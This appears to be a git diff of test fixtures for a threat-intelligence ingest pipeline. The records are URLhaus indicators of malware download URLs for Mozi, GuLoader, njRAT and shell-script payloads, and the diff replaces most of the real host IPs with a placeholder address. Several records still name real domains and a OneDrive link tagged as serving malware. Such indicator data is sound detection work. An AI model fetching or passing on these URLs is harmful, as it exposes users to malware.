"{\"id\":\"960959\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960959/\",\"url\":\"http://89.160.20.156:34205/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28648,18 +28648,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.162.116:53239/Mozi.m", + "original": "http://89.160.20.156:53239/Mozi.m", "scheme": "http", "port": 53239, - "domain": "117.222.162.116", - "full": "http://117.222.162.116:53239/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53239/Mozi.m" }, - "ip": "117.222.162.116" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694686505Z", - "original": "{\"id\":\"960957\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960957/\",\"url\":\"http://117.222.162.116:53239/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.162.116\",\"date_added\":\"2021-01-14 16:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028916600Z", + "original": "{\"id\":\"960957\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960957/\",\"url\":\"http://89.160.20.156:53239/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28697,18 +28697,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.215.209.95:53868/Mozi.m", + "original": "http://89.160.20.156:53868/Mozi.m", "scheme": "http", "port": 53868, - "domain": "117.215.209.95", - "full": "http://117.215.209.95:53868/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53868/Mozi.m" }, - "ip": "117.215.209.95" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694689591Z", - "original": "{\"id\":\"960958\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960958/\",\"url\":\"http://117.215.209.95:53868/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.215.209.95\",\"date_added\":\"2021-01-14 16:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028923100Z", + "original": "{\"id\":\"960958\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960958/\",\"url\":\"http://89.160.20.156:53868/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28746,18 +28746,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://116.75.192.72:39724/Mozi.m", + "original": "http://89.160.20.156:39724/Mozi.m", "scheme": "http", "port": 39724, - "domain": "116.75.192.72", - "full": "http://116.75.192.72:39724/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39724/Mozi.m" }, - "ip": "116.75.192.72" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694692676Z", - "original": "{\"id\":\"960955\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960955/\",\"url\":\"http://116.75.192.72:39724/Mozi.m\",\"url_status\":\"offline\",\"host\":\"116.75.192.72\",\"date_added\":\"2021-01-14 16:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028929800Z", + "original": "{\"id\":\"960955\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960955/\",\"url\":\"http://89.160.20.156:39724/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28795,18 +28795,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.213.43.181:60804/Mozi.m", + "original": "http://89.160.20.156:60804/Mozi.m", "scheme": "http", "port": 60804, - "domain": "117.213.43.181", - "full": "http://117.213.43.181:60804/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60804/Mozi.m" }, - "ip": "117.213.43.181" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694696363Z", - "original": "{\"id\":\"960956\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960956/\",\"url\":\"http://117.213.43.181:60804/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.213.43.181\",\"date_added\":\"2021-01-14 16:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028936400Z", + "original": "{\"id\":\"960956\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960956/\",\"url\":\"http://89.160.20.156:60804/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28844,18 +28844,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.5.149.145:51949/Mozi.m", + "original": "http://89.160.20.156:51949/Mozi.m", "scheme": "http", "port": 51949, - "domain": "123.5.149.145", - "full": "http://123.5.149.145:51949/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51949/Mozi.m" }, - "ip": "123.5.149.145" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694699519Z", - "original": "{\"id\":\"960953\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960953/\",\"url\":\"http://123.5.149.145:51949/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.5.149.145\",\"date_added\":\"2021-01-14 16:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028943100Z", + "original": "{\"id\":\"960953\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960953/\",\"url\":\"http://89.160.20.156:51949/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28893,18 +28893,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.41.114.210:48224/Mozi.m", + "original": "http://89.160.20.156:48224/Mozi.m", "scheme": "http", "port": 48224, - "domain": "125.41.114.210", - "full": "http://125.41.114.210:48224/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48224/Mozi.m" }, - "ip": "125.41.114.210" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694703346Z", - "original": "{\"id\":\"960954\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960954/\",\"url\":\"http://125.41.114.210:48224/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.41.114.210\",\"date_added\":\"2021-01-14 16:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028949600Z", + "original": "{\"id\":\"960954\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960954/\",\"url\":\"http://89.160.20.156:48224/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28942,18 +28942,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.201.171.61:37716/Mozi.m", + "original": "http://89.160.20.156:37716/Mozi.m", "scheme": "http", "port": 37716, - "domain": "113.201.171.61", - "full": "http://113.201.171.61:37716/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37716/Mozi.m" }, - "ip": "113.201.171.61" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694706582Z", - "original": "{\"id\":\"960952\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960952/\",\"url\":\"http://113.201.171.61:37716/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.201.171.61\",\"date_added\":\"2021-01-14 16:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028956300Z", + "original": "{\"id\":\"960952\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960952/\",\"url\":\"http://89.160.20.156:37716/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28991,18 +28991,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://101.108.135.252:60524/Mozi.m", + "original": "http://89.160.20.156:60524/Mozi.m", "scheme": "http", "port": 60524, - "domain": "101.108.135.252", - "full": "http://101.108.135.252:60524/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60524/Mozi.m" }, - "ip": "101.108.135.252" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694709608Z", - "original": "{\"id\":\"960951\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960951/\",\"url\":\"http://101.108.135.252:60524/Mozi.m\",\"url_status\":\"offline\",\"host\":\"101.108.135.252\",\"date_added\":\"2021-01-14 16:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028962900Z", + "original": "{\"id\":\"960951\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960951/\",\"url\":\"http://89.160.20.156:60524/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29049,7 +29049,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.694712764Z", + "ingested": "2021-12-13T08:40:08.028969600Z", "original": "{\"id\":\"960946\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960946/\",\"url\":\"http://urlfrance.fr/code/dd.txt\",\"url_status\":\"offline\",\"host\":\"urlfrance.fr\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"Encoded\",\"njRAT\",\"rat\"]}", "category": "threat", "type": "indicator", @@ -29089,18 +29089,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://136.34.57.224:49988/bin.sh", + "original": "http://89.160.20.156:49988/bin.sh", "scheme": "http", "port": 49988, - "domain": "136.34.57.224", - "full": "http://136.34.57.224:49988/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49988/bin.sh" }, - "ip": "136.34.57.224" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694715950Z", - "original": "{\"id\":\"960947\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960947/\",\"url\":\"http://136.34.57.224:49988/bin.sh\",\"url_status\":\"online\",\"host\":\"136.34.57.224\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.028976200Z", + "original": "{\"id\":\"960947\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960947/\",\"url\":\"http://89.160.20.156:49988/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29138,18 +29138,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.50.64.136:42857/Mozi.m", + "original": "http://89.160.20.156:42857/Mozi.m", "scheme": "http", "port": 42857, - "domain": "115.50.64.136", - "full": "http://115.50.64.136:42857/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42857/Mozi.m" }, - "ip": "115.50.64.136" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694719086Z", - "original": "{\"id\":\"960948\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960948/\",\"url\":\"http://115.50.64.136:42857/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.50.64.136\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028982900Z", + "original": "{\"id\":\"960948\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960948/\",\"url\":\"http://89.160.20.156:42857/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29188,18 +29188,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://200.52.228.27:44751/bin.sh", + "original": "http://89.160.20.156:44751/bin.sh", "scheme": "http", "port": 44751, - "domain": "200.52.228.27", - "full": "http://200.52.228.27:44751/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44751/bin.sh" }, - "ip": "200.52.228.27" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694722522Z", - "original": "{\"id\":\"960949\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960949/\",\"url\":\"http://200.52.228.27:44751/bin.sh\",\"url_status\":\"offline\",\"host\":\"200.52.228.27\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.028989600Z", + "original": "{\"id\":\"960949\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960949/\",\"url\":\"http://89.160.20.156:44751/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29237,18 +29237,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.63.203.134:47719/Mozi.m", + "original": "http://89.160.20.156:47719/Mozi.m", "scheme": "http", "port": 47719, - "domain": "115.63.203.134", - "full": "http://115.63.203.134:47719/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47719/Mozi.m" }, - "ip": "115.63.203.134" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694726159Z", - "original": "{\"id\":\"960950\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960950/\",\"url\":\"http://115.63.203.134:47719/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.63.203.134\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028996300Z", + "original": "{\"id\":\"960950\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960950/\",\"url\":\"http://89.160.20.156:47719/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29286,18 +29286,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://181.194.120.182:38133/Mozi.m", + "original": "http://89.160.20.156:38133/Mozi.m", "scheme": "http", "port": 38133, - "domain": "181.194.120.182", - "full": "http://181.194.120.182:38133/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38133/Mozi.m" }, - "ip": "181.194.120.182" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694729786Z", - "original": "{\"id\":\"960945\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960945/\",\"url\":\"http://181.194.120.182:38133/Mozi.m\",\"url_status\":\"offline\",\"host\":\"181.194.120.182\",\"date_added\":\"2021-01-14 15:59:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"07ac0n\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029003100Z", + "original": "{\"id\":\"960945\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960945/\",\"url\":\"http://89.160.20.156:38133/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:59:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"07ac0n\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29343,7 +29343,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.694734024Z", + "ingested": "2021-12-13T08:40:08.029009700Z", "original": "{\"id\":\"960944\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960944/\",\"url\":\"http://www.sowetoson.com/new/Host_yjwloaz52.bin\",\"url_status\":\"online\",\"host\":\"www.sowetoson.com\",\"date_added\":\"2021-01-14 15:57:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"encrypted\",\"GuLoader\"]}", "category": "threat", "type": "indicator", @@ -29390,7 +29390,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.694738262Z", + "ingested": "2021-12-13T08:40:08.029066700Z", "original": "{\"id\":\"960942\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960942/\",\"url\":\"https://www.agamagroup.com.ng/zxc/janomo_uGdNtpvRY170.bin\",\"url_status\":\"online\",\"host\":\"www.agamagroup.com.ng\",\"date_added\":\"2021-01-14 15:57:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"encrypted\",\"GuLoader\"]}", "category": "threat", "type": "indicator", @@ -29437,7 +29437,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.694773149Z", + "ingested": "2021-12-13T08:40:08.029092100Z", "original": "{\"id\":\"960943\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960943/\",\"url\":\"https://onedrive.live.com/download?cid=8FE9EB3F9398B325\u0026resid=8FE9EB3F9398B325%21126\u0026authkey=AOzL9FiDhEYRkm8\",\"url_status\":\"online\",\"host\":\"onedrive.live.com\",\"date_added\":\"2021-01-14 15:57:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"encrypted\",\"GuLoader\"]}", "category": "threat", "type": "indicator", @@ -29476,18 +29476,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.93.22.84:46462/Mozi.m", + "original": "http://89.160.20.156:46462/Mozi.m", "scheme": "http", "port": 46462, - "domain": "59.93.22.84", - "full": "http://59.93.22.84:46462/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46462/Mozi.m" }, - "ip": "59.93.22.84" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694781745Z", - "original": "{\"id\":\"960941\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960941/\",\"url\":\"http://59.93.22.84:46462/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.93.22.84\",\"date_added\":\"2021-01-14 15:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029099300Z", + "original": "{\"id\":\"960941\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960941/\",\"url\":\"http://89.160.20.156:46462/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29525,18 +29525,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.95.173.7:39046/Mozi.m", + "original": "http://89.160.20.156:39046/Mozi.m", "scheme": "http", "port": 39046, - "domain": "59.95.173.7", - "full": "http://59.95.173.7:39046/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39046/Mozi.m" }, - "ip": "59.95.173.7" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694787055Z", - "original": "{\"id\":\"960940\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960940/\",\"url\":\"http://59.95.173.7:39046/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.95.173.7\",\"date_added\":\"2021-01-14 15:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029106Z", + "original": "{\"id\":\"960940\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960940/\",\"url\":\"http://89.160.20.156:39046/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29574,18 +29574,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.66.103:47418/Mozi.m", + "original": "http://89.160.20.156:47418/Mozi.m", "scheme": "http", "port": 47418, - "domain": "42.224.66.103", - "full": "http://42.224.66.103:47418/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47418/Mozi.m" }, - "ip": "42.224.66.103" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694792265Z", - "original": "{\"id\":\"960934\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960934/\",\"url\":\"http://42.224.66.103:47418/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.66.103\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029112700Z", + "original": "{\"id\":\"960934\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960934/\",\"url\":\"http://89.160.20.156:47418/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29623,18 +29623,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.228.37.137:42287/Mozi.m", + "original": "http://89.160.20.156:42287/Mozi.m", "scheme": "http", "port": 42287, - "domain": "42.228.37.137", - "full": "http://42.228.37.137:42287/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42287/Mozi.m" }, - "ip": "42.228.37.137" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694796924Z", - "original": "{\"id\":\"960935\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960935/\",\"url\":\"http://42.228.37.137:42287/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.228.37.137\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029119200Z", + 